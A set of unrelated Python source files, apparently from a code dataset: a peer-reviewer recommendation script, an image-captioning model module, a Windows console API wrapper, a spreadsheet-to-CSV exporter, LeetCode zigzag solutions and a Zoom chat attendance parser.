# Keyword arguments (input csv path, submitted-manuscript DataFrame, index of the i-th manuscript, number of reviewers to recommend, silhouette-score search range)
def professionalism(path,extractive_keyword_result,reviewee_index,top_limit,silhouette_range=25):
reviewee=extractive_keyword_result
index=reviewee_index
top=top_limit
temp_id,temp_doi = 0,''
temp_title = reviewee.loc[index]['submitter_title']
temp_attribure = reviewee.loc[index]['submitter_attribute']
reviewer_attr = pd.read_csv(path, encoding='latin1')
reviewer_attr.loc[-1]=[str(temp_id),temp_doi,temp_title,temp_attribure]
reviewer_attr.index += 1
reviewer_attr.sort_index(inplace=True)
reviewer=reviewer_attr['reviewer_paper_attribure']
jac_token,jac,cos,avg=[],[],[],[]
for t in range(len(reviewer)):
jac_token.append(set(nltk.ngrams((nltk.word_tokenize(reviewer[t])), n=1)))
for j in range(len(reviewer)):
jac.append(1-(nltk.jaccard_distance(jac_token[0], jac_token[j])))
count_vectorizer = CountVectorizer(stop_words='english')
count_vectorizer = CountVectorizer()
sparse_matrix = count_vectorizer.fit_transform(reviewer)
doc_term_matrix = sparse_matrix.todense()
df = pd.DataFrame(doc_term_matrix,
columns=count_vectorizer.get_feature_names(),
index=[i for i in reviewer])
cos=cosine_similarity(df, df)[0].tolist()
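    # Final similarity: simple average of unigram Jaccard similarity and count-vector cosine
    # similarity between the submitted manuscript (row 0) and each reviewer attribute set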
for i in range(len(jac)):
avg.append((jac[i] + cos[i])/2)
reviewer_attr['sim']=avg
vectorizer = TfidfVectorizer(stop_words='english')
Y = vectorizer.fit_transform(reviewer)
YY = Y.toarray()
X = StandardScaler().fit_transform(YY)
top_avg,top_k=0,0
silhouette,k_mean,k_mean2=[],[],[]
for i in range(2,silhouette_range+1,1):
model = SpectralClustering(n_clusters=i, affinity="nearest_neighbors")
cluster_labels = model.fit_predict(X)
sample_silhouette_values = silhouette_samples(YY, cluster_labels)
silhouette_avg = sample_silhouette_values.mean()
if top_avg < silhouette_avg:
top_avg = silhouette_avg
top_k = i
silhouette_temp=[]
silhouette_temp.append('k=' + str(i) + '일때 : ')
silhouette_temp.append(silhouette_avg)
silhouette.append(silhouette_temp)
model = KMeans(n_clusters=(top_k), init='k-means++', max_iter=100, n_init=1)
model.fit(Y)
for k in range(len(reviewer)):
YYY = vectorizer.transform([reviewer[k]])
prediction = model.predict(YYY)
k_mean.append(prediction)
for k in range(len(reviewer)):
k_mean2.append(int(k_mean[k][0]))
reviewer_attr['k_mean']=k_mean2
kmean_reviewer = reviewer_attr[reviewer_attr['k_mean'] == reviewer_attr.loc[0]['k_mean']]
kmean_reviewer2 = kmean_reviewer.sort_values(by=['sim'], axis=0, ascending=False)
professionalism=kmean_reviewer2.iloc[1:top+1]
#return type : pandas.dataframe
return professionalism
# Conflict-of-interest check function definition
# Keyword arguments (reviewer-candidate co-author csv path, reviewer-candidate information csv path, reviewer-candidate co-author network csv path, expertise-check-result DataFrame, submitted-manuscript DataFrame, index of the i-th manuscript, number of reviewers to recommend, number of co-author network matrix multiplications)
def interest(co_author_path, reviewer_information_path, co_author_network_path, professionalism_result, extractive_keyword_result, reviewee_index,top_limit,matrix_multifly_count):
crash_result,reviewee_list=[],[]
reviewer_list1,reviewer_co_list=[],[]
path1=co_author_path
path2=reviewer_information_path
network_path=co_author_network_path
temp = professionalism_result
reviewee=extractive_keyword_result
index=reviewee_index
top=top_limit
multifly=matrix_multifly_count
co_author_csv = pd.read_csv(path1, encoding='latin1')
co_author_df = co_author_csv.merge(temp, on=['reviewer_orcid'])
tt = co_author_df.iloc[:]['reviewer_name'].tolist()
reviewee_list=[]
reviewee.fillna(0, inplace=True)
for i in range(1,11):
col_index = (i*3)+5
if reviewee.loc[index][col_index] != 0:
reviewee_list.append(reviewee.loc[index][col_index])
reviewer_list,reviewer_co_list=[],[]
for j in range(len(co_author_csv)):
co_list_temp=[]
reviewer_list.append(co_author_csv['reviewer_name'][j])
co_list_temp.append(co_author_csv['reviewer_name'][j])
for i in range(1,11):
col_index = (i*2)
if co_author_csv.loc[j][col_index] != 0:
co_list_temp.append(co_author_csv.loc[j][col_index])
reviewer_co_list.append(co_list_temp)
co_rel_df = pd.DataFrame(
columns=[i for i in reviewer_list],
index=[j for j in reviewee_list])
for j in range(len(reviewee_list)):
for i in range(len(reviewer_list)):
for k in range(len(reviewer_co_list[i])):
if reviewee_list[j] == reviewer_co_list[i][k]:
co_rel_df.iat[j, i] = 1
co_rel_df.fillna(0, inplace=True)
try :
matrix_df = pd.read_csv(co_author_network_path, encoding='latin1', index_col=0)
except FileNotFoundError :
index = co_author_csv['reviewer_orcid'].index[co_author_csv['reviewer_orcid'].apply(np.isnan)]
df_index = co_author_csv.index.values.tolist()
nan_range =[df_index.index(i) for i in index]
try :
import_csv2=co_author_csv.iloc[:nan_range[0]]
id_list=import_csv2['reviewer_name'].tolist()
except IndexError :
import_csv2=co_author_csv
id_list = co_author_csv.iloc[:]['reviewer_name'].tolist()
matrix_df = pd.DataFrame(
columns=[i for i in id_list],
index=[j for j in id_list])
for i in range(len(id_list)):
for j in range(len(id_list)):
index=[1,]
index.extend([(j*2) for j in range(1,11)])
for k in range(11):
if (id_list[i]) == (import_csv2.iloc[j][index[k]]) :
print(id_list[i], import_csv2.iloc[j][index[k]])
print(i)
matrix_df.iat[j, i] = 1
matrix_df.iat[i, j] = 1
if str(id_list[i]) == str(id_list[j]):
matrix_df.iat[i, j] = 0
matrix_df.fillna(0, inplace=True)
matrix_df.to_csv(co_author_network_path)
for i in range(multifly):
matrix_df = matrix_df.dot(matrix_df)
a=matrix_df.values
b=co_rel_df.values
aaa = b.dot(a)
aaa2=pd.DataFrame(data=aaa,
index=(co_rel_df.index).tolist(),
columns=(matrix_df.index).tolist())
a_series = (aaa2 != 0).any(axis=1)
new_df = aaa2.loc[a_series]
ccc=(new_df.index).tolist()
ddd=co_author_df['reviewer_name'].tolist()
reviewer_list1 = list(set(ddd).difference(ccc))
co_inst_csv = pd.read_csv(path2, encoding='latin1')
co_inst_df = co_inst_csv.merge(temp, on=['reviewer_orcid'])
reviewee_list2,reviewer_list2,reviewer_inst_list=[],[],[]
reviewee.fillna(0, inplace=True)
for i in range(1,11):
col_index = (i*3)+6
if reviewee.loc[index][col_index] != 0:
reviewee_list2.append(reviewee.loc[index][col_index])
for j in range(len(co_inst_df)):
inst_list_temp=[]
reviewer_list2.append(co_inst_df['reviewer_name'][j])
reviewer_inst_list.append(co_inst_df['reviewer_institution'][j])
inst_rel_df = pd.DataFrame(
columns=[i for i in reviewee_list2],
index=[j for j in reviewer_list2])
for i in range(len(reviewee_list2)):
for j in range(len(reviewer_list2)):
if reviewee_list2[i] == reviewer_inst_list[j]:
inst_rel_df.iat[j, i] = 1
for i in range(len(reviewer_list2)):
if (inst_rel_df.sum(axis=1)[i]) > 0:
reviewer_list2.remove(inst_rel_df.index[i])
crash_result.append(inst_rel_df.index[i])
reviewer_list1,reviewer_list2 = reviewer_list1[0:top*2],reviewer_list2[0:top*2]
reviewer_rank = list(set(reviewer_list1).intersection(reviewer_list2))
id_index,sim_index,count_index=[],[],[]
reviewer_rank = pd.DataFrame({'reviewer_name': reviewer_rank})
for i in range(len(reviewer_rank)):
for j in range(len(co_author_df)):
if reviewer_rank.loc[i]['reviewer_name'] == co_author_df.loc[j]['reviewer_name'] :
id_index.append(int(co_author_df.iloc[j]['reviewer_orcid']))
sim_index.append(co_author_df.iloc[j]['sim'])
if reviewer_rank.loc[i]['reviewer_name'] == co_inst_df.loc[j]['reviewer_name'] :
count_index.append(co_inst_df.iloc[j]['count'])
reviewer_rank['reviewer_orcid']=id_index
reviewer_rank['sim']=sim_index
reviewer_rank['count']=count_index
#return type : pandas.dataframe
return reviewer_rank
# CSV save function definition
# Keyword arguments (save path, submitted-manuscript DataFrame, expertise-check DataFrame, index of the i-th manuscript, number of reviewers to recommend)
def save_csv(output_path,extractive_keyword_result,professionalism_result,reviewee_index,top_limit):
path=output_path
reviewee=extractive_keyword_result
reviewer_rank_name=professionalism_result
ee_num=reviewee_index
top=top_limit
export_data=[]
for i in range((top*2)):
temp=[]
temp.append(reviewee.iloc[(1//top*2)+ee_num]['submitter_title'])
temp.append(reviewee.iloc[(1//top*2)+ee_num]['date'])
temp.append(reviewee.iloc[(1//top*2)+ee_num]['submitter_name'])
temp.append(reviewer_rank_name.iloc[i]['reviewer_name'])
temp.append(reviewer_rank_name.iloc[i]['reviewer_orcid'])
temp.append(reviewer_rank_name.iloc[i]['sim'])
temp.append(reviewer_rank_name.iloc[i]['count'])
export_data.append(temp)
try :
export_csv = pd.read_csv(path,index_col=0)
except FileNotFoundError :
export_csv = pd.DataFrame([],columns=[
'submitter_title','date','submitter_name','reviewer_name','reviewer_orcid','sim','count'])
for i in range(len(export_data)):
export_csv.loc[len(export_csv)] = export_data[i]
export_csv.to_csv(path)
# Equal-assignment (load-balancing) function definition
# Keyword arguments (input csv path, output csv path)
def equl_distribution(input_csv_path, output_csv_path):
final_list=[]
export_csv2 = pd.read_csv(input_csv_path,index_col=0)
class Paper:
def __init__(self, title, date, submitter, reviwer_name, reviwer_orcid, sim, count):
self.title = title
self.date = date
self.submitter = submitter
self.reviwer_name = reviwer_name
self.reviwer_orcid = reviwer_orcid
self.sim = sim
self.count = count
def __repr__(self):
return repr((self.title, self.date, self.submitter, self.reviwer_name, self.reviwer_orcid, self.sim, self.count))
papers,objs=[export_csv2.iloc[i].tolist() for i in range(len(export_csv2))],[]
for paper in papers:
objs.append(Paper(*paper))
o = (multisort(list(objs), (('date', False), ('sim', True))))
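    # Rows are ordered by date (ascending) then similarity (descending); each manuscript supplied
    # 6 candidate rows, and the loop below keeps the first 3 whose reviewer holds fewer than 3 assignments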
for i in range(0,len(export_csv2),6) :
temp_list=[]
for t in range(6):
if len(temp_list) == 3:
break
else :
temp = i + t
if (o[temp].count) < 3 :
o[temp].count += 1
for j in range(0+temp, len(export_csv2)) :
if (o[temp].reviwer_name == o[j].reviwer_name) :
o[j].count += 1
o[temp].count -= 1
temp_list.append(o[temp])
final_list.extend(temp_list)
final=pd.DataFrame(final_list,columns=['result'])
final.to_csv(output_csv_path)
# Default execution (main) function definition
def main():
    # Extract the attribute set from the submitted manuscripts
    # Keyword arguments (input csv path, output csv path including the attribute set, number of words to extract)
reviewee=extractive_keyword(path='../reviewee/submitter_10.csv',
database_update_path='../reviewee/reviwupdate.csv',
extract_word_num=20)
#return type : pandas.dataframe
    # Run one full check set per submitted manuscript
for i in range(len(reviewee)):
        # Expertise check
        # Keyword arguments (input csv path, submitted-manuscript DataFrame, index of the i-th manuscript, number of reviewers to recommend, silhouette-score search range)
reviewer=professionalism(path='../reviewer_pool/reviewer_attribute_5.csv',
extractive_keyword_result=reviewee,
reviewee_index=i,
top_limit=10,
silhouette_range=25)
#return type : pandas.dataframe
        # Conflict-of-interest check
        # Keyword arguments (reviewer-candidate co-author csv path, reviewer-candidate information csv path, reviewer-candidate co-author network csv path,
        # expertise-check-result DataFrame, submitted-manuscript DataFrame, index of the i-th manuscript, number of reviewers to recommend, number of co-author network matrix multiplications)
reviewer_rank = interest(
co_author_path='../reviewer_pool/reviewer_coauthor_5.csv',
reviewer_information_path='../reviewer_pool/reviewer_information_5.csv',
co_author_network_path='../reviewer_pool/co_author_network_0525.csv',
professionalism_result=reviewer,
extractive_keyword_result=reviewee,
reviewee_index=i,
top_limit=6,
matrix_multifly_count=1)
#return type : pandas.dataframe
        # Save results to csv
        # Keyword arguments (save path, submitted-manuscript DataFrame, expertise-check DataFrame, index of the i-th manuscript, number of reviewers to recommend)
save_csv(output_path='../system_output/export_csv_0525_10.csv',
extractive_keyword_result=reviewee,
professionalism_result=reviewer_rank,
reviewee_index=i,
top_limit=3)
    # Equal assignment of reviewers
    # Keyword arguments (input csv path, output csv path)
equl_distribution(input_csv_path='../system_output/export_csv_0525_10.csv',
output_csv_path='../system_output/final_csv_0525_10.csv')
if __name__ == '__main__':
    # Default execution function
main()
| 29.01855
| 179
| 0.609949
| 544
| 0.029972
| 0
| 0
| 0
| 0
| 0
| 0
| 3,256
| 0.179394
|
3c988a3bbfa24fe5c3273607b2e3a5909c559524
| 2,241
|
py
|
Python
|
controlimcap/models/flatattn.py
|
SikandarBakht/asg2cap
|
d8a6360eaccdb8c3add5f9c4f6fd72764e47e762
|
[
"MIT"
] | 169
|
2020-03-15T08:41:39.000Z
|
2022-03-30T09:36:17.000Z
|
controlimcap/models/flatattn.py
|
wtr850/asg2cap
|
97a1d866d4a2b86c1f474bb168518f97eb2f8b96
|
[
"MIT"
] | 25
|
2020-05-23T15:14:00.000Z
|
2022-03-10T06:20:31.000Z
|
controlimcap/models/flatattn.py
|
wtr850/asg2cap
|
97a1d866d4a2b86c1f474bb168518f97eb2f8b96
|
[
"MIT"
] | 25
|
2020-04-02T10:08:01.000Z
|
2021-12-09T12:10:10.000Z
|
import torch
import torch.nn as nn
import framework.configbase
import caption.encoders.vanilla
import caption.decoders.attention
import caption.models.attention
import controlimcap.encoders.flat
from caption.models.attention import MPENCODER, ATTNENCODER, DECODER
class NodeBUTDAttnModel(caption.models.attention.BUTDAttnModel):
def forward_encoder(self, input_batch):
attn_embeds = self.submods[ATTNENCODER](input_batch['attn_fts'])
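    # Masked mean pooling: sum node embeddings at valid (unmasked) positions and divide by the
    # number of valid nodes to obtain a single graph-level embedding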
graph_embeds = torch.sum(attn_embeds * input_batch['attn_masks'].unsqueeze(2), 1)
graph_embeds = graph_embeds / torch.sum(input_batch['attn_masks'], 1, keepdim=True)
enc_states = self.submods[MPENCODER](
torch.cat([input_batch['mp_fts'], graph_embeds], 1))
return {'init_states': enc_states, 'attn_fts': attn_embeds}
class NodeRoleBUTDAttnModelConfig(caption.models.attention.AttnModelConfig):
def __init__(self):
super().__init__()
self.subcfgs[ATTNENCODER] = controlimcap.encoders.flat.EncoderConfig()
class NodeRoleBUTDAttnModel(caption.models.attention.BUTDAttnModel):
def build_submods(self):
submods = {}
submods[MPENCODER] = caption.encoders.vanilla.Encoder(self.config.subcfgs[MPENCODER])
submods[ATTNENCODER] = controlimcap.encoders.flat.Encoder(self.config.subcfgs[ATTNENCODER])
submods[DECODER] = caption.decoders.attention.BUTDAttnDecoder(self.config.subcfgs[DECODER])
return submods
def prepare_input_batch(self, batch_data, is_train=False):
outs = super().prepare_input_batch(batch_data, is_train=is_train)
outs['node_types'] = torch.LongTensor(batch_data['node_types']).to(self.device)
outs['attr_order_idxs'] = torch.LongTensor(batch_data['attr_order_idxs']).to(self.device)
return outs
def forward_encoder(self, input_batch):
attn_embeds = self.submods[ATTNENCODER](input_batch['attn_fts'],
input_batch['node_types'], input_batch['attr_order_idxs'])
graph_embeds = torch.sum(attn_embeds * input_batch['attn_masks'].unsqueeze(2), 1)
graph_embeds = graph_embeds / torch.sum(input_batch['attn_masks'], 1, keepdim=True)
enc_states = self.submods[MPENCODER](
torch.cat([input_batch['mp_fts'], graph_embeds], 1))
return {'init_states': enc_states, 'attn_fts': attn_embeds}
| 43.096154
| 95
| 0.764391
| 1,965
| 0.876841
| 0
| 0
| 0
| 0
| 0
| 0
| 217
| 0.096832
|
3c99a84bfa19cff4eef1b2a7eb8aeb82d35b63a6
| 5,169
|
py
|
Python
|
pywincffi/kernel32/console.py
|
opalmer/pycffiwin32
|
39210182a92e93c37a9f1c644fd5fcc1aa32f6d1
|
[
"MIT"
] | 10
|
2015-11-19T12:39:50.000Z
|
2021-02-21T20:15:29.000Z
|
pywincffi/kernel32/console.py
|
opalmer/pycffiwin32
|
39210182a92e93c37a9f1c644fd5fcc1aa32f6d1
|
[
"MIT"
] | 109
|
2015-06-15T05:03:33.000Z
|
2018-01-14T10:18:48.000Z
|
pywincffi/kernel32/console.py
|
opalmer/pycffiwin32
|
39210182a92e93c37a9f1c644fd5fcc1aa32f6d1
|
[
"MIT"
] | 8
|
2015-07-29T04:18:27.000Z
|
2018-11-02T17:15:40.000Z
|
"""
Console
-------
A module containing functions for interacting with a Windows
console.
"""
from six import integer_types
from pywincffi.core import dist
from pywincffi.core.checks import NON_ZERO, NoneType, input_check, error_check
from pywincffi.exceptions import WindowsAPIError
from pywincffi.wintypes import HANDLE, SECURITY_ATTRIBUTES, wintype_to_cdata
def SetConsoleTextAttribute(hConsoleOutput, wAttributes):
"""
Sets the attributes of characters written to a console buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/setconsoletextattribute
:param pywincffi.wintypes.HANDLE hConsoleOutput:
A handle to the console screen buffer. The handle must have the
``GENERIC_READ`` access right.
:param int wAttributes:
The character attribute(s) to set.
"""
input_check("hConsoleOutput", hConsoleOutput, HANDLE)
input_check("wAttributes", wAttributes, integer_types)
ffi, library = dist.load()
# raise Exception(type(wAttributes))
# info = ffi.new("PCHAR_INFO")
code = library.SetConsoleTextAttribute(
wintype_to_cdata(hConsoleOutput),
ffi.cast("ATOM", wAttributes)
)
error_check("SetConsoleTextAttribute", code=code, expected=NON_ZERO)
def GetConsoleScreenBufferInfo(hConsoleOutput):
"""
Retrieves information about the specified console screen buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/getconsolescreenbufferinfo
:param pywincffi.wintypes.HANDLE hConsoleOutput:
A handle to the console screen buffer. The handle must have the
``GENERIC_READ`` access right.
:returns:
Returns a ffi data structure with attributes corresponding to
the fields on the ``PCONSOLE_SCREEN_BUFFER_INFO`` struct.
"""
input_check("hConsoleOutput", hConsoleOutput, HANDLE)
ffi, library = dist.load()
info = ffi.new("PCONSOLE_SCREEN_BUFFER_INFO")
code = library.GetConsoleScreenBufferInfo(
wintype_to_cdata(hConsoleOutput), info)
error_check("GetConsoleScreenBufferInfo", code, expected=NON_ZERO)
return info
def CreateConsoleScreenBuffer(
dwDesiredAccess, dwShareMode, lpSecurityAttributes=None, dwFlags=None):
"""
Creates a console screen buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/createconsolescreenbuffer
:type dwDesiredAccess: int or None
:param dwDesiredAccess:
The access to the console screen buffer. If `None` is provided
then the Windows APIs will use a default security descriptor.
:type dwShareMode: int or None
:param dwShareMode:
Controls the options for sharing the resulting handle. If `None` or
0 then the resulting buffer cannot be shared.
:keyword pywincffi.wintypes.SECURITY_ATTRIBUTES lpSecurityAttributes:
Extra security attributes that determine if the resulting handle
can be inherited. If `None` is provided, which is the default, then
the handle cannot be inherited.
:keyword int dwFlags:
The type of console buffer to create. The flag is superficial because
it only accepts None or ``CONSOLE_TEXTMODE_BUFFER`` as inputs. If no
value is provided, which is the default, then
``CONSOLE_TEXTMODE_BUFFER`` is automatically used.
:rtype: :class:`pywincffi.wintypes.HANDLE``
:returns:
Returns the handle created by the underlying C function.
:func:`pywincffi.kernel32.CloseHandle` should be called on the handle
when you are done with it.
"""
ffi, library = dist.load()
if dwDesiredAccess is None:
dwDesiredAccess = ffi.NULL
if dwShareMode is None:
dwShareMode = 0
if dwFlags is None:
dwFlags = library.CONSOLE_TEXTMODE_BUFFER
input_check(
"dwDesiredAccess", dwDesiredAccess, allowed_values=(
ffi.NULL,
library.GENERIC_READ,
library.GENERIC_WRITE,
library.GENERIC_READ | library.GENERIC_WRITE
))
input_check(
"dwShareMode", dwShareMode, allowed_values=(
0,
library.FILE_SHARE_READ,
library.FILE_SHARE_WRITE,
library.FILE_SHARE_READ | library.FILE_SHARE_WRITE,
))
input_check(
"dwFlags", dwFlags,
allowed_values=(
library.CONSOLE_TEXTMODE_BUFFER,
))
input_check(
"lpSecurityAttributes", lpSecurityAttributes,
allowed_types=(NoneType, SECURITY_ATTRIBUTES))
if lpSecurityAttributes is None:
lpSecurityAttributes = ffi.NULL
handle = library.CreateConsoleScreenBuffer(
ffi.cast("DWORD", dwDesiredAccess),
ffi.cast("DWORD", dwShareMode),
lpSecurityAttributes,
ffi.cast("DWORD", dwFlags),
ffi.NULL # _reserved_
)
if handle == library.INVALID_HANDLE_VALUE: # pragma: no cover
raise WindowsAPIError(
"CreateConsoleScreenBuffer", "Invalid Handle",
library.INVALID_HANDLE_VALUE,
expected_return_code="not INVALID_HANDLE_VALUE")
return HANDLE(handle)
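# Hypothetical usage sketch (illustrative only; CloseHandle is provided elsewhere in pywincffi.kernel32):
#   handle = CreateConsoleScreenBuffer(GENERIC_READ | GENERIC_WRITE, 0)
#   ... write to / read from the buffer ...
#   CloseHandle(handle)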
| 32.923567
| 83
| 0.691623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,739
| 0.52989
|
3c9a8ed33f779646dc17846360f63018c12812e8
| 2,568
|
py
|
Python
|
src/extractClimateObservations.py
|
bcgov/nr-rfc-ensweather
|
5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6
|
[
"Apache-2.0"
] | 1
|
2021-03-23T15:32:39.000Z
|
2021-03-23T15:32:39.000Z
|
src/extractClimateObservations.py
|
bcgov/nr-rfc-ensweather
|
5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6
|
[
"Apache-2.0"
] | 7
|
2021-02-05T00:52:08.000Z
|
2022-03-01T21:37:43.000Z
|
src/extractClimateObservations.py
|
bcgov/nr-rfc-ensweather
|
5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6
|
[
"Apache-2.0"
] | 2
|
2021-02-24T20:29:39.000Z
|
2021-03-23T15:32:44.000Z
|
"""
extracts the climate observation data from the xlsx spreadsheet to a csv file
so that ens weather scripts can consume it.
Looks in the folder os.environ["ENS_CLIMATE_OBS"]
determines the relationship between the xlsx source and the csv destinations
deletes any CSVs and regenerates them by exporting the ALL_DATA sheet
from the corresponding xlsx file
"""
import csv
import glob
import logging.config
import openpyxl
import os
import pandas as pd
import config.logging_config
logging.config.dictConfig(config.logging_config.LOGGING_CONFIG)
LOGGER = logging.getLogger(__name__)
excelFileDir = os.environ["ENS_CLIMATE_OBS"]
excelFileGlobPattern = "ClimateDataOBS_*.xlsx"
csvFileNamePattern = "climate_obs_{year}.csv"
sheetName = 'ALL_DATA'
def convertCsvXlrd(excelFile, sheetName, csvFile):
# print(f"sheetname: {sheetName}") read_only=True
wb = openpyxl.load_workbook(excelFile, data_only=True, keep_vba=True, read_only=True)
sh = wb[sheetName]
if sh.calculate_dimension() == "A1:A1":
sh.reset_dimensions()
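    # (read-only worksheets can report a stale "A1:A1" dimension; resetting above lets iter_rows see the full used range)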
with open(csvFile, "w", newline="") as f:
c = csv.writer(f)
cnt = 0
for r in sh.iter_rows(): # generator; was sh.rows
c.writerow([cell.value for cell in r])
#print(cnt)
cnt += 1
def convertCsvPandas(excelFile, csvFileFullPath):
"""
Doesn't work for some reason
"""
data_xls = pd.read_excel(excelFile, sheet_name="ALL_DATA")
data_xls.to_csv(csvFileFullPath, encoding="utf-8", index=False, header=True)
if __name__ == "__main__":
globDir = os.path.join(excelFileDir, excelFileGlobPattern)
LOGGER.debug(f"glob pattern: {excelFileGlobPattern}")
excelClimateObservationFiles = glob.glob(globDir)
for excelFile in excelClimateObservationFiles:
LOGGER.info(f"input excelFile: {excelFile}")
# extract the year from the filename
excelFileBasename = os.path.basename(excelFile)
year = os.path.splitext(excelFileBasename)[0].split("_")[1]
LOGGER.debug(f"year from excel file parse: {year}")
csvFileName = csvFileNamePattern.format(year=year)
LOGGER.info(f"output csv file: {csvFileName}")
csvFileFullPath = os.path.join(excelFileDir, csvFileName)
if os.path.exists(csvFileFullPath):
LOGGER.info(f"deleting the csv file: {csvFileFullPath}")
os.remove(csvFileFullPath)
LOGGER.info(f"dumping the sheet: {sheetName} from the file {excelFile} to {csvFileFullPath}")
convertCsvXlrd(excelFile, sheetName, csvFileFullPath)
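# Usage sketch (hedged): with ENS_CLIMATE_OBS pointing at a folder that contains,
# for example, ClimateDataOBS_2021.xlsx (file name illustrative), running this module
# exports that workbook's ALL_DATA sheet to climate_obs_2021.csv in the same folder:
#   ENS_CLIMATE_OBS=/path/to/obs python extractClimateObservations.py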
| 35.178082
| 101
| 0.712227
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 908
| 0.353583
|
3c9b6cb2f965c39ce2408034c9338f67c659fa02
| 403
|
py
|
Python
|
Python/Basic Data Types/finding-the-percentage.py
|
mateusnr/hackerrank-solutions
|
2fa60bae480d8afb46e3d99929707a7d9d92858f
|
[
"CC0-1.0"
] | 1
|
2015-08-01T04:03:47.000Z
|
2015-08-01T04:03:47.000Z
|
Python/Basic Data Types/finding-the-percentage.py
|
mateusnr/hackerrank-solutions
|
2fa60bae480d8afb46e3d99929707a7d9d92858f
|
[
"CC0-1.0"
] | null | null | null |
Python/Basic Data Types/finding-the-percentage.py
|
mateusnr/hackerrank-solutions
|
2fa60bae480d8afb46e3d99929707a7d9d92858f
|
[
"CC0-1.0"
] | 4
|
2020-05-04T15:12:21.000Z
|
2021-02-18T11:58:30.000Z
|
n = int(input()) # takes the number of arguments
mdict = {}
for i in range(0,n):
grades = input().split(" ") # self explanatory
scores = list(map(float, grades[1:])) # since the first element from the list grades is the name of the student
mdict[grades[0]] = sum(scores)/float(len(scores)) # the key is the name of the student and the value is the average
print("%.2f" % mdict[input()])
| 50.375
| 120
| 0.665012
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 196
| 0.486352
|
3c9c7350a4efa3be4f373180a4fc5ceaa1d748e4
| 2,764
|
py
|
Python
|
src/6_ZigZagConversion.py
|
chenbin11200/AlgorithmInPython
|
222780f14afdafc4c7d0047b6f1477bd0b0ecf0f
|
[
"MIT"
] | null | null | null |
src/6_ZigZagConversion.py
|
chenbin11200/AlgorithmInPython
|
222780f14afdafc4c7d0047b6f1477bd0b0ecf0f
|
[
"MIT"
] | null | null | null |
src/6_ZigZagConversion.py
|
chenbin11200/AlgorithmInPython
|
222780f14afdafc4c7d0047b6f1477bd0b0ecf0f
|
[
"MIT"
] | null | null | null |
class Solution(object):
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
evenColumnIndex = True
result = []
stringLength = len(s)
if numRows >= stringLength or numRows == 1:
return s
fullLine = numRows
groupLine = 2 * fullLine - 2
i = rowIndex = 0
for rowIndex in range(0, fullLine):
i = rowIndex
evenColumnIndex = True
while i < stringLength:
result.append(s[i])
if rowIndex == 0 or rowIndex == numRows - 1:
i = i + groupLine
else:
if evenColumnIndex:
i = i + groupLine - rowIndex * 2
else:
i = i + rowIndex * 2
evenColumnIndex = not evenColumnIndex
rowIndex = rowIndex + 1
return ''.join(result)
class BestSolution(object):
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or numRows >= len(s):
return s
L = [''] * numRows
index, step = 0, 1
for x in s:
L[index] += x
if index == 0:
step = 1
elif index == numRows - 1:
step = -1
index += step
return ''.join(L)
# This is NOT zigzag conversion, instead it is
# 1 5 9
# 2 4 6 8 .
# 3 7 .
class Solution2(object):
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
evenRowIndex = evenColumnIndex = True
result = []
stringLength = len(s)
if numRows >= stringLength or numRows == 1:
return s
fullLine = numRows
        leckLine = (numRows + 1) // 2
groupLine = 2 * fullLine - leckLine
i = rowIndex = 0
for rowIndex in range(0, fullLine):
i = rowIndex
evenColumnIndex = True
while i < stringLength:
if evenRowIndex:
result.append(s[i])
i = i + groupLine
else:
result.append(s[i])
if evenColumnIndex:
                        i = i + (fullLine - rowIndex - 1) + (rowIndex + 1) // 2
                    else:
                        i = i + (fullLine - leckLine) - rowIndex // 2 + rowIndex
evenColumnIndex = not evenColumnIndex
rowIndex = rowIndex + 1
evenRowIndex = not evenRowIndex
return ''.join(result)
print(BestSolution().convert('abc', 2))
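# Sanity check against the classic example: with numRows=3, "PAYPALISHIRING" reads
# row by row as "PAHNAPLSIIGYIR".
# print(BestSolution().convert('PAYPALISHIRING', 3))  # -> 'PAHNAPLSIIGYIR'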
| 27.098039
| 79
| 0.45152
| 2,636
| 0.95369
| 0
| 0
| 0
| 0
| 0
| 0
| 341
| 0.123372
|
3c9d412ce7e720587944a183ef63dc8c3a37cb1a
| 2,437
|
py
|
Python
|
server/server/parsing/session.py
|
PixelogicDev/zoom_attendance_check
|
7c47066d006ae2205ccb04371115904ec48e3bda
|
[
"MIT"
] | 1
|
2020-12-30T19:39:56.000Z
|
2020-12-30T19:39:56.000Z
|
server/server/parsing/session.py
|
PixelogicDev/zoom_attendance_check
|
7c47066d006ae2205ccb04371115904ec48e3bda
|
[
"MIT"
] | null | null | null |
server/server/parsing/session.py
|
PixelogicDev/zoom_attendance_check
|
7c47066d006ae2205ccb04371115904ec48e3bda
|
[
"MIT"
] | null | null | null |
import pandas as pd
class Session:
def __init__(self, students_df, df_session_chat, meta_data):
self._first_message_time = df_session_chat["time"].sort_values().iloc[0]
self._relevant_chat = self.get_participants_in_session(students_df, df_session_chat, meta_data)
@ staticmethod
def get_participants_in_session(df_students, df_chat, meta_data):
"""
finds students that attendant to the session. runs over each mode which represent different way to declare that
the student attendant (for example: phone number, ID). merges this data to the csv table with the zoom name that
added it
:param df_chat: that table of the chat for the specific session
:return: df of the attendance in the session
"""
final_df = None
for mode in meta_data.filter_modes:
merged_df = pd.merge(df_students, df_chat.reset_index(), left_on=mode, right_on="message", how="left")
final_df = pd.concat([merged_df, final_df])
final_df.sort_values(by="time", inplace=True)
df_participated = final_df.groupby("zoom_name").first().reset_index()
df_participated["index"] = df_participated["index"].astype(int)
df_participated = df_participated.loc[:, ["id", "zoom_name", "time", "message", "index"]].set_index("index")
filt = df_chat['zoom_name'].str.contains('|'.join(meta_data.zoom_names_to_ignore))
df_relevant_chat = pd.merge(df_chat[~filt], df_participated, how="left")
df_relevant_chat["relevant"] = df_relevant_chat["id"].apply(lambda x: 1 if x == x else 0)
df_relevant_chat["id"] = df_relevant_chat["id"].apply(lambda x: int(x) if x == x else -1)
return df_relevant_chat
